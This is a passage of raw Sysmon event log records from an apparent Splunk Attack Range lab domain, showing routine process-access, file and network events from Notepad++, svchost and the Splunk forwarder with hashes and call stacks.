Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 23542300x8000000000000000806925Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:33.801{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4D7F117B9824FDFB5FC34F9400094D2,SHA256=9E937D38FE1CC7786D39ADE2CCE3CA5BEEE9E57322905EB1F29190D674C186CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:33.117{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56A6B6D79C361CA3B61E75113613E2D4,SHA256=C7C7EC6EE330F015BBD2BC571B0DC3D29E68E38F81DA8F5812622AA924C8193C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806927Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:34.806{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C024576196DED93302CC0FFF2879B805,SHA256=B3220DE351E3D9395E2053F3E75700C51827AD5AAC6AE8AF67B1A51130357BC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:34.154{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=159806411A868D965135C313275BEB3F,SHA256=440AFC75AD98F6C9C467632DB1DB1E16F12F2AE3F097EB364FF37762A8855D8E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806926Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:33.371{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57217-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806928Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:35.821{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDAB76836988648663EF658D96AF35E4,SHA256=D506A3BF525AF00EF8F8438B9D78BAC4A1D470BB7F502CFAFE6E1C2872C6D755,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:35.185{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54E632766D8D96EF1253BCFA0C71FE9B,SHA256=528B8B49A796F58B61720B24719FF31C2CDF6B8FDEDB62B2D7C9C541DF54BBFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806929Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:36.837{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E83A8E78A7D44B7FE29CD4F6A2190A4B,SHA256=70A4CCDE2718260F20848889407B4144C6CBEEE41A66514219411BD44580D299,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.620{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50970-false10.0.1.12-8000- 23542300x80000000000000001047532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:36.215{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AA6B52D7A5FF4ED150E7C58FE986FB4,SHA256=CA5EB5696A6339BE667F63C2541F97918C8348CDF9F4BDA76324464D6AEB7E58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806930Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:37.853{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3452B609B16326EA53314AD1C449A509,SHA256=0CBA9FD1DBC2ADA64C974DED6F1FF5B687BEAF7025814CCF21925A32A8DD065F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:37.233{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DD1CDB246847B4D7E2B96466610A0E8,SHA256=5B1150B080E738CBFF03ADE00A8D138BB72A487425CC878B8DDCD0924C9DD18B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806931Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:38.868{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B2460DD1EB1BCF39680C51424420EFC,SHA256=1116C06D4C28CABC0B53F6938D58B413641471A64081DD3D796EE79B84EB5B35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:38.498{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=A58736E2B09577D46FC6CFDF6DEF27AE,SHA256=0BB00C61963F04D875232B0F6B587C675B19C926DCF8C372186611CDC417C023,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:38.251{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0E703AFEA2A05EA585A428FC6F5F58,SHA256=345F5D9C2A43210B12581C0B8B04773160FD2EBDE0A7767AF8210C40A114E5FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806932Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:39.931{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AB77908FA68F13E0F10AD35DFC6033A,SHA256=B3F59C1736159F170D809F0EAFFC2BC8E8CE146EED9CA23681AE0D6765E085FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:39.281{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E2118A058A87A7BDDB4B6984BCF9A1B,SHA256=E6299D7284CF72DA4BE0D0D7881222FFE381872FBCB1E2DDE6CCC186EA650FF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806934Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:40.962{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E563817945719B39415F87EE4834E991,SHA256=3CA3CBC64C0E5B59B4437ABFEB12932410FFABB48E343E7647935307EB23788C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:40.296{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEF48B4BAC1F726516410DCF524841B3,SHA256=350DD9BDBE5DEC6AD4FB75B7010598F3483324510236FE630DA08416EA3875D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806933Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:39.360{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57218-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806935Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:41.978{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AA53A1B373B052BAD98183E42EAC480,SHA256=B8C5F2AF2D8308838213417B5739C393921D85EF2B126DE201E8C18C96F921AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:41.429{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:41.429{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:41.428{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:41.310{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5F7C46294A8D69F22BECF393CDACB0E,SHA256=0951975F854B699524AD5CC13CBB9D0ECDC3593467E0A337409830EBC348E800,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806936Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:42.994{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45908D51261B717C00F6842DF0619869,SHA256=3F61788BDA807400ABFA3F2BFD792DD1E11B2FF8ADFA1639968E874525FF444E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:42.329{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADC43EACCE9D8AD964E21638B00F2A97,SHA256=F0E0853DE7315C7C1860C5840612BA316F199E10B201A5C7819DA27F0B6B89DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:34.599{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50971-false10.0.1.12-8000- 23542300x80000000000000001047544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:43.348{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9882679075407E5411D425200E7E283F,SHA256=8251B38414FACDC8A695521419680E726C4CF44EBB54DFA81CB5A6A1E4F9FC14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:44.363{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32B550B24512271BFAE48D236CEB3FD5,SHA256=5E91A418118D788F4037281EEF8ACD1B6E9D122565C8F277344D74A9A371087C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806937Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:44.039{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5AC530C60B7039032F2795BCA136174,SHA256=08143EF8F79EF18F464118CB60E372B0A1E22E934C80DEDCE48D983BBBD2BD5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.393{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0EA3F9C3F999B5BD80E54E1401DBB8F,SHA256=EC6545D56C26D3A2C5E62688882E9F9253839AF8B70452A06BB36C1CDF810B36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806938Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:45.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE4E8DA422C2F9C2033EB2B5A6B2E1C9,SHA256=F8AB9D99E020F52E89F942D0E3894DAC95D32438266E6A0D333D843C00891D40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:46.408{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B70FD1F3C6A249007D4E4A565D9DAF28,SHA256=D566B9F2B4D31257FC09DB394A126B9715C3B11A25B48B0368470C5398FB5125,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806939Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:46.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 